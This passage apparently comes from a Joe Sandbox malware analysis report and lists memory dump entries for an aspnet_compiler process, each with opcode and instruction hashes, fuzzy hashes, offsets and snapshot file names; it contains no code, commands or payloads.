                                                                • Opcode Fuzzy Hash: e8ce70fffb7ab615650fc67c17d250c5dbba090dbf2f8d65e81da9c895046ab1
                                                                • Instruction Fuzzy Hash: EC512D70A1D65D9FDB98DB68C465BA9BBF1FF69300F5041EAD04DD72A1CA34A980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f471f76f33d510cb3b17ce2455affe762e5b030f36601c083b8fe8122ca3a92
                                                                • Instruction ID: 3e4c9c5761c9c043c7329ea120a288b56e75341ae71e1605b2f86888905e604d
                                                                • Opcode Fuzzy Hash: 7f471f76f33d510cb3b17ce2455affe762e5b030f36601c083b8fe8122ca3a92
                                                                • Instruction Fuzzy Hash: 6F515D70A19A5D9FDB98DBA8C465BACBBF1FF69300F4041EED04DD72A1DA346980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d3ee4de9625e8003f33b0c83bfb2f8ec088b2231a85507601cbb607739fbf0d
                                                                • Instruction ID: 9103c265527c30fb4b52e46c0e26ca452442ab5cfd6552d98eab278e597a167e
                                                                • Opcode Fuzzy Hash: 7d3ee4de9625e8003f33b0c83bfb2f8ec088b2231a85507601cbb607739fbf0d
                                                                • Instruction Fuzzy Hash: 7B512D70A19A5D9FDB98DBA8C465BADBBF1FF69300F5041EED04DD72A1CA345980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2297fba201b144835da9c3aeefcec276c3d6c2b8c460e29e82064c61ac6fed8d
                                                                • Instruction ID: eb4c9a4a65510d9d8db8eccac2c832bfe8d1a3b1db24d30bfea242de31b74901
                                                                • Opcode Fuzzy Hash: 2297fba201b144835da9c3aeefcec276c3d6c2b8c460e29e82064c61ac6fed8d
                                                                • Instruction Fuzzy Hash: 56513C70E1965D9FDB98DBA8C465BA8BBF1FF69300F4041EED04DD72A1CA346980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8fe2f45a8d03611cedd9627d32f01e2a18f47047be810dc400711f860d75fa4b
                                                                • Instruction ID: fb7dc57f796d98160c375446848d0715dad132676227760058207bea0089801c
                                                                • Opcode Fuzzy Hash: 8fe2f45a8d03611cedd9627d32f01e2a18f47047be810dc400711f860d75fa4b
                                                                • Instruction Fuzzy Hash: CF51AD30A0A24E9FDB559FB4C469AADBBB0FF16314F5141BEC00ADB1A2CB385946CB41
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd1657bf252f80252516d580ab2de52e3980204b17d042fafb8fd50af239dceb
                                                                • Instruction ID: 038b4def0375d4066574debb304036f548831bb3858e324d7c0633e4698334b3
                                                                • Opcode Fuzzy Hash: cd1657bf252f80252516d580ab2de52e3980204b17d042fafb8fd50af239dceb
                                                                • Instruction Fuzzy Hash: 7F31F672A1E54EAFE7A5A7A8D8E51EC7BE0FF55620F060079D089C71F7DE2829438700
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8219274dcb7f47b2d1ed84450edf0aa3d596d0c7b0e15577df1dcfeeb0894029
                                                                • Instruction ID: b170234b6722d6d4fbc4b2be86dbdec93f4552f0c06dfa98f643e594df6fdbdd
                                                                • Opcode Fuzzy Hash: 8219274dcb7f47b2d1ed84450edf0aa3d596d0c7b0e15577df1dcfeeb0894029
                                                                • Instruction Fuzzy Hash: 33310672A1E58EAFE7A5A7A898E51EC7BE0FF45610F060079D049C71E6DE282942C700
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1fea92f07a044242c4f47725d42c48448bbb399b0da1ec06b9dd4f56ca0df56
                                                                • Instruction ID: 239f899cee26dd38b07f1c889529652e1445c64509abd85149299569e3f45119
                                                                • Opcode Fuzzy Hash: a1fea92f07a044242c4f47725d42c48448bbb399b0da1ec06b9dd4f56ca0df56
                                                                • Instruction Fuzzy Hash: 91417C3090E2499FD75ADB64C864AE8BBF0FF16310F0541FAD059DB2A2CB7C5A85CB02
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8408b569dd53bc3ce7d0b183f7a96abf79471247cd990a3ad74bec6890334b6a
                                                                • Instruction ID: b5025cdb685f59fb1e0466eafb988eec800c81f3a4b0c6a812328890f46e259e
                                                                • Opcode Fuzzy Hash: 8408b569dd53bc3ce7d0b183f7a96abf79471247cd990a3ad74bec6890334b6a
                                                                • Instruction Fuzzy Hash: C8316871A0A64E9FE745ABA488357EDBFE0FF56320F4141FAC008C71E6EA3828458342
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7610941fe5d5a536c4bbd14a56f3e0b87e9976b31f577ab5c160072c3c48026a
                                                                • Instruction ID: fdc76e22c4a425f7162aa969183d87c607b7b9f1b4710a0ed4507d36b1b55322
                                                                • Opcode Fuzzy Hash: 7610941fe5d5a536c4bbd14a56f3e0b87e9976b31f577ab5c160072c3c48026a
                                                                • Instruction Fuzzy Hash: 3531F672A1E58EAFE7A5A7B898E51EC7BE0FF55610F460079D049C71F7DE282942C700
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5893f1969d451239d0881bdae15a60a4359aba6ac3c6d693ea1215d70ca6309
                                                                • Instruction ID: 8b350579527aea41c10353b4f2d57d7c38a146276e51b742ea530cce2b7803ff
                                                                • Opcode Fuzzy Hash: a5893f1969d451239d0881bdae15a60a4359aba6ac3c6d693ea1215d70ca6309
                                                                • Instruction Fuzzy Hash: 8131E870955A5D9FEB91EB78885E7D9BBF4FF29300F1440EAC04DD7261DA385E868B00
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6011629861d8d48b0f16a5d299cec0fcea4dc0a92b622e14fa7b741bcdafea61
                                                                • Instruction ID: 231e227d341ef6b346316de160d8f740455a4012e5237502d797cffde695e0e5
                                                                • Opcode Fuzzy Hash: 6011629861d8d48b0f16a5d299cec0fcea4dc0a92b622e14fa7b741bcdafea61
                                                                • Instruction Fuzzy Hash: 55218170919A4C8FDB81EBA8C859ADD7FF0FF19310F04056AD008D71A2DB349981CB41
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15480eb5cd9bf7a716e3a3355d560d211e654db8a549bf2d6d4409a70946c508
                                                                • Instruction ID: d2eb113e35b3655f1b30e61aaf63bbc1cf8f7f4a937e3b00c93da035b67157a7
                                                                • Opcode Fuzzy Hash: 15480eb5cd9bf7a716e3a3355d560d211e654db8a549bf2d6d4409a70946c508
                                                                • Instruction Fuzzy Hash: 8431FBB0945A5DAFDB91EB78885E7D9BBF4FF19300F5440EAC04DC7261DA385D828B00
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81a49528390821a38dba7985c7b7a858969b19b3c4561360891ca226b03dcf9f
                                                                • Instruction ID: 5354a93f6ba4ce2085818b2b46d6c93503d812c1ca153ee9225cd55889a85498
                                                                • Opcode Fuzzy Hash: 81a49528390821a38dba7985c7b7a858969b19b3c4561360891ca226b03dcf9f
                                                                • Instruction Fuzzy Hash: A1212A70E2961E9FEB65DF98C854BEDB7B1FF44304F0041A8D019A32A4DB386A85CF80
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88268304dab62ea07c4cb3b99ea300aba06aff18e9433c1a6f3c2c6c5105347f
                                                                • Instruction ID: fb3b6010d15129b814e332c087ae506ecc4809b55b91cc5f02574866df6624bc
                                                                • Opcode Fuzzy Hash: 88268304dab62ea07c4cb3b99ea300aba06aff18e9433c1a6f3c2c6c5105347f
                                                                • Instruction Fuzzy Hash: 5C116A3048E6CA5FD3435BB08C286D67FB1AF87324F0940E6D089CB0A2C96D5A4AC722
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfbfcaaa1bfec6566989af85d2fda98edbf9b78d62e15b0407091dca9433a738
                                                                • Instruction ID: 6e37162c5df9369eb890f78c6b1b1f64086ef85a5ab327a23d2f97d1f3cf7c75
                                                                • Opcode Fuzzy Hash: cfbfcaaa1bfec6566989af85d2fda98edbf9b78d62e15b0407091dca9433a738
                                                                • Instruction Fuzzy Hash: 7C218CB0A1A7488FDB5ADB64C855A987FB0FF1A311F1140EAD089DB2A2DA355D81CB10
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 554c933d042e459bfdfb0badabf6837bcea63c54efac2fedb075618c5abfe0e3
                                                                • Instruction ID: e6493efeb43254d0b14e649a5ab29701a49285b1dcca108075cf6eb519426c12
                                                                • Opcode Fuzzy Hash: 554c933d042e459bfdfb0badabf6837bcea63c54efac2fedb075618c5abfe0e3
                                                                • Instruction Fuzzy Hash: 69015E30D1974E9FDBAADF58C864AEDB7B1FF44300F0042A9D419932A1DB386A46CF40
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd